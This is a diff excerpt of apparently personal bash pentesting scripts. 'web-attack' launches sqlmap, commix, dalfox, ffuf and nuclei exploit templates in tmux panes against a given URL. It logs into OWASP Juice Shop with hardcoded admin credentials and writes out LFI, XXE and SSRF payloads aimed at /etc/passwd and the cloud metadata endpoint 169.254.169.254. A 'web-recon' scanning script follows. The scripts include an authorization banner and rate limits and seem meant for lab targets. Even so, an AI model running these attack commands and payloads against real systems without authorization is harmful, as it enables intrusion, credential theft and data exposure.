||||
# Attempt to get authentication token for Juice Shop
|
||||
get_juice_shop_auth() {
|
||||
local url="$1"
|
||||
|
||||
# Check if this is Juice Shop (localhost:3002)
|
||||
if [[ ! "$url" =~ localhost:3002 ]]; then
|
||||
return 1
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Detected Juice Shop - attempting authentication..."
|
||||
|
||||
# Login and extract JWT token
|
||||
local response=$(curl -s -X POST "${url}/rest/user/login" \
|
||||
-H "Content-Type: application/json" \
|
||||
-d '{"email":"admin@juice-sh.op","password":"admin123"}' 2>/dev/null)
|
||||
|
||||
if [[ -z "$response" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Could not connect to Juice Shop login endpoint"
|
||||
return 1
|
||||
fi
|
||||
|
||||
# Extract token from response
|
||||
AUTH_TOKEN=$(echo "$response" | jq -r '.authentication.token' 2>/dev/null)
|
||||
|
||||
if [[ -n "$AUTH_TOKEN" ]] && [[ "$AUTH_TOKEN" != "null" ]]; then
|
||||
echo -e "${GREEN}✓${NC} Successfully authenticated as admin@juice-sh.op"
|
||||
echo -e "${CYAN}[*]${NC} JWT token obtained (will be used by all tools)"
|
||||
return 0
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} Authentication failed - continuing without auth"
|
||||
AUTH_TOKEN=""
|
||||
return 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Main web-attack function
|
||||
run_web_attack() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${RED}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ ⚠️ ACTIVE EXPLOITATION TESTING ⚠️ ║"
|
||||
echo "║ Target: $url"
|
||||
echo "║ AUTHORIZATION REQUIRED - LEGAL USE ONLY ║"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Authorization check
|
||||
check_authorization "$url"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Attempt Juice Shop authentication
|
||||
export AUTH_TOKEN=""
|
||||
get_juice_shop_auth "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_attacks_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window with 6 panes
|
||||
tmux new-window -n "--> ATTACK: ${url:0:15}... <--"
|
||||
|
||||
# Create 3x2 grid (6 panes total)
|
||||
# CRITICAL: Tmux renumbers panes during splits, pane 0 disappears
|
||||
# Strategy: Create 3 columns first, then split each vertically
|
||||
# Final layout:
|
||||
# [1: sqlmap] [3: dalfox] [5: nuclei]
|
||||
# [2: commix] [4: ffuf] [6: manual]
|
||||
|
||||
# Create 3 columns (horizontal splits)
|
||||
tmux split-window -h
|
||||
tmux split-window -h
|
||||
|
||||
# Select leftmost pane and split vertically (creates bottom-left)
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Select middle pane and split vertically (creates bottom-middle)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Select rightmost pane and split vertically (creates bottom-right)
|
||||
tmux select-pane -t 4
|
||||
tmux split-window -v
|
||||
|
||||
# Note: tmux 'tiled' layout may choose 2x3 or 3x2 depending on terminal size
|
||||
# Current result: 2 columns x 3 rows (vertical orientation)
|
||||
# Both layouts work fine - tmux optimizes based on available space
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final pane numbering after tiled layout:
|
||||
# If 2x3 (2 columns, 3 rows): If 3x2 (3 columns, 2 rows):
|
||||
# 1 4 1 3 5
|
||||
# 2 5 2 4 6
|
||||
# 3 6
|
||||
|
||||
# Pane 1 (top-left): SQLMap (SQL injection)
|
||||
tmux select-pane -t 1
|
||||
if command -v sqlmap &>/dev/null; then
|
||||
# Use recon URLs if available, otherwise deep crawl
|
||||
# Rate-limited: 1 thread, 2 second delay to prevent target crash
|
||||
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||
local url_count=$(wc -l < "$RECON_URLS")
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms --headers='Authorization: Bearer \$AUTH_TOKEN' -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||
fi
|
||||
else
|
||||
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||
local url_count=$(wc -l < "$RECON_URLS")
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Testing ${url_count} URLs from web-recon...${NC}' && sqlmap -m recon-urls.txt --batch --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} SQLMap: Deep crawl mode (no recon data)...${NC}' && sqlmap -u '$url' --batch --crawl=2 --level=2 --risk=2 --threads=1 --delay=2 --forms -o --output-dir=sqlmap 2>&1 | tee sqlmap.log && echo -e '${GREEN}✓ SQLMap complete${NC}'" C-m
|
||||
fi
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ sqlmap not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (bottom-left): Commix (command injection)
|
||||
tmux select-pane -t 2
|
||||
if command -v commix &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Commix: Command injection testing...${NC}' && timeout 120 commix -u '$url' --batch --crawl=2 --output-dir=commix 2>&1 | tee commix.log || echo 'Commix timeout or no vulns' && echo -e '${GREEN}✓ Commix complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ commix not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (top-middle): Dalfox (XSS detection)
|
||||
tmux select-pane -t 3
|
||||
if command -v dalfox &>/dev/null; then
|
||||
# Use recon URLs if available for better XSS detection
|
||||
# Rate-limited: 200ms delay between requests (balanced speed/safety)
|
||||
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||
local url_count=$(wc -l < "$RECON_URLS")
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon (authenticated)...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -H 'Authorization: Bearer \$AUTH_TOKEN' -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||
fi
|
||||
else
|
||||
if [[ -n "$RECON_URLS" ]] && [[ -f "$RECON_URLS" ]]; then
|
||||
local url_count=$(wc -l < "$RECON_URLS")
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Testing ${url_count} URLs from web-recon...${NC}' && dalfox file recon-urls.txt --delay=200 --follow-redirects -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 3 && echo -e '${GREENSTAR} Dalfox: Crawler mode (no recon data)...${NC}' && dalfox url '$url' --delay=200 --follow-redirects --crawler-mode -w 3 -o dalfox.txt 2>&1 | tee dalfox.log && echo -e '${GREEN}✓ Dalfox complete${NC}'" C-m
|
||||
fi
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ dalfox not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-middle): FFUF (parameter fuzzing)
|
||||
tmux select-pane -t 4
|
||||
if command -v ffuf &>/dev/null; then
|
||||
# Check if payload script exists
|
||||
if command -v payload &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} FFUF: Parameter fuzzing with payloads...${NC}' && payload sqli basic > sqli.txt && payload xss basic > xss.txt && echo 'admin' > users.txt && echo 'password' >> users.txt && ffuf -u '$url?id=FUZZ' -w sqli.txt -mc 200,500 -o ffuf-sqli.json 2>&1 | head -50 && echo -e '${GREEN}✓ FFUF complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ payload script not found - basic ffuf only${NC}' && echo \"' OR '1'='1\" > payloads.txt && ffuf -u '$url?id=FUZZ' -w payloads.txt -mc 200,500 2>&1 | head -50" C-m
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ ffuf not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 5 (top-right): Nuclei (exploit templates only)
|
||||
tmux select-pane -t 5
|
||||
if command -v nuclei &>/dev/null; then
|
||||
# Rate-limited: 10 requests/second, stagger start by 6 seconds
|
||||
# Add JWT auth header if available (using proper escaping for tmux send-keys)
|
||||
if [[ -n "$AUTH_TOKEN" ]]; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates (authenticated)...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -H 'Authorization: Bearer \$AUTH_TOKEN' -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && sleep 6 && echo -e '${GREENSTAR} Nuclei: Running exploit templates...${NC}' && nuclei -u '$url' -s critical,high -rl 10 -c 5 -t ~/nuclei-templates/exposures/ -t ~/nuclei-templates/vulnerabilities/ -t ~/nuclei-templates/cves/ -o nuclei-exploits.txt 2>&1 | tee nuclei.log && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 6 (bottom-right): Manual LFI/XXE/SSRF testing
|
||||
tmux select-pane -t 6
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Manual vulnerability testing...${NC}' && echo 'Testing LFI/XXE/SSRF vectors...' && echo '# LFI Tests' > manual-tests.txt && echo '$url?file=../../../../etc/passwd' >> manual-tests.txt && echo '$url?page=....//....//etc/passwd' >> manual-tests.txt && echo '# XXE Test' >> manual-tests.txt && echo '<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>' >> manual-tests.txt && echo '# SSRF Test' >> manual-tests.txt && echo '$url?url=http://169.254.169.254/latest/meta-data/' >> manual-tests.txt && cat manual-tests.txt && echo -e '${CYAN}[*] Manual tests prepared. Review and execute as needed.${NC}'" C-m
|
||||
|
||||
# Focus back on sqlmap pane
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux web-attack window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> ATTACK: ${url:0:15}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Rate Limiting:${NC} Tools staggered and rate-limited to prevent target crash"
|
||||
echo -e "${YELLOW}Target Safety:${NC} 500ms-1s delays, reduced threads, max 10 req/sec"
|
||||
echo -e "${YELLOW}Note:${NC} Review results carefully - automated tools have false positives"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_attacks_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running SQLMap...${NC}"
|
||||
command -v sqlmap &>/dev/null && sqlmap -u "$url" --batch --crawl=2 --level=2 --risk=2 -o --output-dir=sqlmap || echo "sqlmap not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running Dalfox...${NC}"
|
||||
command -v dalfox &>/dev/null && dalfox url "$url" --deep-domxss -o dalfox.txt || echo "dalfox not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running Nuclei exploits...${NC}"
|
||||
command -v nuclei &>/dev/null && nuclei -u "$url" -s critical,high -o nuclei-exploits.txt || echo "nuclei not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running Commix...${NC}"
|
||||
command -v commix &>/dev/null && timeout 120 commix -u "$url" --batch --output-dir=commix || echo "commix not installed or no vulns"
|
||||
|
||||
cd ..
|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Web attack complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: web-attack <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run web attacks
|
||||
run_web_attack "$url"
|
||||
265
scripts/pentesting/web-recon
Executable file
265
scripts/pentesting/web-recon
Executable file
|
|
@ -0,0 +1,265 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: web-recon.sh
|
||||
# Description: Web application reconnaissance with tmux orchestration
|
||||
# Usage: web-recon <url>
|
||||
# Creates tmux window with parallel web scans (nuclei, feroxbuster, katana, arjun)
|
||||
|
||||
VERSION="2.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
# Status indicators
|
||||
readonly GREENPLUS="${GREEN}[+]${NC}"
|
||||
readonly GREENSTAR="${YELLOW}[*]${NC}"
|
||||
readonly REDMINUS="${RED}[-]${NC}"
|
||||
readonly REDEXCLAIM="${RED}[!]${NC}"
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}web-recon${NC} - Web Application Reconnaissance v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " web-recon <url>"
|
||||
echo
|
||||
echo -e "${BOLD}DESCRIPTION:${NC}"
|
||||
echo " Creates tmux window with 4 panes running parallel/pipelined web reconnaissance:"
|
||||
echo " - Pane 1 (top-left): nuclei (vulnerability scanner)"
|
||||
echo " - Pane 2 (top-right): feroxbuster → arjun (pipeline)"
|
||||
echo " - Pane 3 (bottom-left): katana (web crawler with JS parsing)"
|
||||
echo " - Pane 4 (bottom-right): live results dashboard"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " web-recon http://target.htb"
|
||||
echo " web-recon https://example.com"
|
||||
echo " web-recon 10.10.10.5"
|
||||
echo
|
||||
echo -e "${BOLD}OUTPUT:${NC}"
|
||||
echo " All results saved to: ./web-recon-<target>-<timestamp>/"
|
||||
echo
|
||||
echo -e "${BOLD}WORKFLOW:${NC}"
|
||||
echo " - Nuclei & Katana: Run in parallel immediately"
|
||||
echo " - Feroxbuster (5 min) → Arjun: Pipeline (arjun waits for feroxbuster)"
|
||||
echo " - httpx: Live monitoring - probes URLs as they're discovered"
|
||||
}
|
||||
|
||||
# Check required tools
|
||||
check_tools() {
|
||||
local missing=()
|
||||
local optional_missing=()
|
||||
|
||||
# Core tools
|
||||
command -v tmux &>/dev/null || missing+=("tmux")
|
||||
|
||||
# Web tools (all optional but warn)
|
||||
command -v nuclei &>/dev/null || optional_missing+=("nuclei")
|
||||
command -v feroxbuster &>/dev/null || optional_missing+=("feroxbuster")
|
||||
command -v katana &>/dev/null || optional_missing+=("katana")
|
||||
command -v arjun &>/dev/null || optional_missing+=("arjun")
|
||||
|
||||
if [[ ${#missing[@]} -gt 0 ]]; then
|
||||
echo -e "${RED}Error:${NC} Missing required tools: ${missing[*]}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
if [[ ${#optional_missing[@]} -gt 0 ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Optional tools missing (scans will be skipped): ${optional_missing[*]}"
|
||||
echo -e "${CYAN}Install with:${NC}"
|
||||
for tool in "${optional_missing[@]}"; do
|
||||
case "$tool" in
|
||||
nuclei) echo " go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" ;;
|
||||
feroxbuster) echo " cargo install feroxbuster (or: sudo apt install feroxbuster)" ;;
|
||||
katana) echo " go install github.com/projectdiscovery/katana/cmd/katana@latest" ;;
|
||||
arjun) echo " pipx install arjun" ;;
|
||||
esac
|
||||
done
|
||||
echo
|
||||
fi
|
||||
}
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir() {
|
||||
local url="$1"
|
||||
local timestamp=$(date +%Y%m%d-%H%M%S)
|
||||
local clean_url=$(echo "$url" | tr '/:' '_' | tr -d 'http')
|
||||
|
||||
OUTPUT_DIR="web-recon-${clean_url}-${timestamp}"
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo -e "${GREEN}✓${NC} Output directory: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Main web-recon function
|
||||
run_web_recon() {
|
||||
local url="$1"
|
||||
|
||||
# Ensure URL has http:// or https://
|
||||
if [[ ! "$url" =~ ^https?:// ]]; then
|
||||
url="http://$url"
|
||||
echo -e "${YELLOW}⚠${NC} No protocol specified, using: $url"
|
||||
fi
|
||||
|
||||
echo -e "${CYAN}${BOLD}"
|
||||
echo "╔════════════════════════════════════════════════════════════╗"
|
||||
echo "║ Web Application Reconnaissance ║"
|
||||
echo "║ Target: $url"
|
||||
echo "╚════════════════════════════════════════════════════════════╝"
|
||||
echo -e "${NC}"
|
||||
|
||||
# Create output directory
|
||||
setup_output_dir "$url"
|
||||
|
||||
# Check if in tmux
|
||||
if [[ -z "${TMUX:-}" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Not in tmux session - running sequentially"
|
||||
run_scans_sequential "$url"
|
||||
return
|
||||
fi
|
||||
|
||||
# Create tmux window
|
||||
WINDOW_NAME="--> Web: ${url:0:20}... <--"
|
||||
tmux new-window -n "$WINDOW_NAME"
|
||||
|
||||
# Split into 4 panes with explicit targeting
|
||||
# Layout: 2x2 grid with pipelines and live monitoring
|
||||
# ACTUAL pane numbers after splits: 1, 2, 3, 4 (no pane 0!)
|
||||
# [1: nuclei] [2: feroxbuster → arjun]
|
||||
# [3: katana] [4: live dashboard]
|
||||
|
||||
# Create 2x2 grid layout
|
||||
# CRITICAL: Tmux pane numbering behavior discovered through testing:
|
||||
# Step 1: split-window -h creates [0:left] [1:right]
|
||||
# Step 2: select pane 0, split-window -v creates [0:TL] [1:BL] [2:right]
|
||||
# Step 3: select pane 2, split-window -v creates [1:TL] [2:TR] [3:BL] [4:BR]
|
||||
#
|
||||
# PANE 0 DISAPPEARS during this process! Final panes are numbered 1, 2, 3, 4
|
||||
|
||||
# Split horizontally first (left | right)
|
||||
tmux split-window -h
|
||||
|
||||
# Split left column vertically
|
||||
tmux select-pane -t 0
|
||||
tmux split-window -v
|
||||
|
||||
# Split right column vertically (target pane 2 after left split)
|
||||
tmux select-pane -t 2
|
||||
tmux split-window -v
|
||||
|
||||
# Force tiled layout for perfect 2x2 grid (equal-sized panes)
|
||||
tmux select-layout tiled
|
||||
|
||||
# Final verified pane layout after tmux renumbering and tiled layout:
|
||||
# 1 (top-left) 2 (top-right)
|
||||
# 3 (bottom-left) 4 (bottom-right)
|
||||
|
||||
# Send commands to each pane with ACTUAL pane numbers after splits
|
||||
# After all splits complete, tmux renumbers panes as: 1 (TL), 2 (TR), 3 (BL), 4 (BR)
|
||||
# (pane 0 disappears during the splitting process)
|
||||
|
||||
# Pane 1 (top-left): nuclei
|
||||
tmux select-pane -t 1
|
||||
if command -v nuclei &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting nuclei vulnerability scan...${NC}' && nuclei -u '$url' -o nuclei.txt && echo -e '${GREEN}✓ Nuclei complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ nuclei not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 2 (top-right): feroxbuster THEN arjun (pipeline)
|
||||
tmux select-pane -t 2
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
# Run feroxbuster, then arjun on discovered URLs
|
||||
if command -v arjun &>/dev/null; then
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true && echo -e '${GREENSTAR} Starting arjun parameter discovery...${NC}' && arjun -u '$url' -oT arjun_main.txt 2>&1 | tee arjun.log && if [ -f urls.txt ] && [ -s urls.txt ]; then echo -e '${GREENSTAR} Running arjun on discovered URLs...${NC}' && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true; fi && echo -e '${GREEN}✓ Arjun complete${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting feroxbuster (5 min limit, default wordlist)...${NC}' && echo -e '${YELLOW}💡 Tip: Install SecLists for better wordlists: sudo apt install seclists${NC}' && timeout 300 feroxbuster -u '$url' -d 3 --force-recursion -C 404 -o feroxbuster.txt 2>&1 | tee feroxbuster-stderr.log || echo 'Feroxbuster exited' && echo -e '${GREEN}✓ Feroxbuster complete${NC}' && cat feroxbuster.txt 2>/dev/null | grep -oE 'http[s]?://[^[:space:]]+' >> urls.txt || true" C-m
|
||||
fi
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ feroxbuster not installed - skipping${NC}' && touch urls.txt" C-m
|
||||
fi
|
||||
|
||||
# Pane 3 (bottom-left): katana (web crawler with all output formats)
|
||||
tmux select-pane -t 3
|
||||
if command -v katana &>/dev/null; then
|
||||
# Full katana with all output formats as originally requested
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${GREENSTAR} Starting katana crawler (full output)...${NC}' && katana -u '$url' -jc -kf all -aff -d 10 -o katana.txt 2>&1 | tee katana.log && katana -u '$url' -jc -kf all -aff -d 10 -f path -o katana_paths.txt && katana -u '$url' -jc -kf all -aff -d 10 -f url -o katana_urls.txt && katana -u '$url' -jc -kf all -aff -d 10 -f udir -o katana_dirs.txt && cat katana_dirs.txt 2>/dev/null | sort -u >> urls.txt && cat katana_paths.txt 2>/dev/null | sed 's/^.//g' >> paths.txt && echo -e '${GREEN}✓ Katana complete (all formats)${NC}'" C-m
|
||||
else
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${YELLOW}⚠ katana not installed - skipping${NC}'" C-m
|
||||
fi
|
||||
|
||||
# Pane 4 (bottom-right): Live results dashboard
|
||||
tmux select-pane -t 4
|
||||
# Watch output files and show live statistics
|
||||
tmux send-keys "cd '$PWD/$OUTPUT_DIR' && echo -e '${CYAN}╔══════════════════════════════════════════════╗${NC}' && echo -e '${CYAN}║ LIVE SCAN RESULTS DASHBOARD ║${NC}' && echo -e '${CYAN}╚══════════════════════════════════════════════╝${NC}' && echo -e '${YELLOW}[*] Monitoring output files...${NC}' && while true; do clear; echo -e '${CYAN}═══ Scan Progress ═══${NC}'; echo; echo -e '${GREEN}Nuclei:${NC}'; [ -f nuclei.txt ] && [ -s nuclei.txt ] && echo \" Found: \$(wc -l < nuclei.txt 2>/dev/null || echo 0) findings\" || echo ' Waiting...'; echo; echo -e '${GREEN}Feroxbuster:${NC}'; [ -f feroxbuster.txt ] && [ -s feroxbuster.txt ] && echo \" Found: \$(wc -l < feroxbuster.txt 2>/dev/null || echo 0) endpoints\" || echo ' Waiting...'; echo; echo -e '${GREEN}Katana:${NC}'; [ -f katana.txt ] && [ -s katana.txt ] && echo \" Crawled: \$(wc -l < katana.txt 2>/dev/null || echo 0) URLs\" || echo ' Waiting...'; echo; echo -e '${GREEN}Arjun:${NC}'; [ -f arjun_main.txt ] && [ -s arjun_main.txt ] && echo \" Found: \$(wc -l < arjun_main.txt 2>/dev/null || echo 0) parameters\" || [ -f arjun.log ] && grep -q 'complete' arjun.log 2>/dev/null && echo ' Complete (0 parameters)' || echo ' Waiting...'; echo; echo -e '${GREEN}URLs Discovered:${NC}'; [ -f urls.txt ] && [ -s urls.txt ] && echo \" Total: \$(sort -u urls.txt 2>/dev/null | wc -l) unique URLs\" && echo && echo -e '${CYAN}Latest URLs:${NC}' && tail -5 urls.txt 2>/dev/null || echo ' None yet'; echo; echo -e '${YELLOW}[Press Ctrl+C to stop monitoring]${NC}'; sleep 3; done" C-m
|
||||
|
||||
# Focus back on top-left pane (nuclei)
|
||||
tmux select-pane -t 1
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}✓${NC} Tmux web-recon window created"
|
||||
echo -e "${CYAN}[*]${NC} Switch to window: ${BOLD}--> Web: ${url:0:20}... <--${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Results will be in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} Feroxbuster will auto-stop after 5 minutes"
|
||||
echo -e "${YELLOW}Note:${NC} Arjun waits 10 seconds before starting"
|
||||
}
|
||||
|
||||
# Sequential execution (when not in tmux)
|
||||
run_scans_sequential() {
|
||||
local url="$1"
|
||||
|
||||
cd "$OUTPUT_DIR"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running nuclei...${NC}"
|
||||
command -v nuclei &>/dev/null && nuclei -u "$url" -o nuclei.txt || echo "nuclei not installed"
|
||||
|
||||
echo -e "\n${GREENSTAR} Running feroxbuster (5 min timeout)...${NC}"
|
||||
if command -v feroxbuster &>/dev/null; then
|
||||
timeout 300 feroxbuster -u "$url" -d 3 --smart --silent --force-recursion -o feroxbuster.txt 2>/dev/null || true
|
||||
cat feroxbuster.txt 2>/dev/null | awk '{print $1}' >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running katana...${NC}"
|
||||
if command -v katana &>/dev/null; then
|
||||
katana -u "$url" -jc -kf all -aff -d 10 -o katana.txt
|
||||
cat katana.txt 2>/dev/null | sort -u >> urls.txt
|
||||
fi
|
||||
|
||||
echo -e "\n${GREENSTAR} Running arjun...${NC}"
|
||||
if command -v arjun &>/dev/null; then
|
||||
arjun -u "$url" -oT arjun_main.txt 2>&1 | tee arjun.log
|
||||
[ -f urls.txt ] && [ -s urls.txt ] && arjun -i urls.txt -oT arjun_urls.txt 2>&1 | tee -a arjun.log || true
|
||||
fi
|
||||
|
||||
cd ..
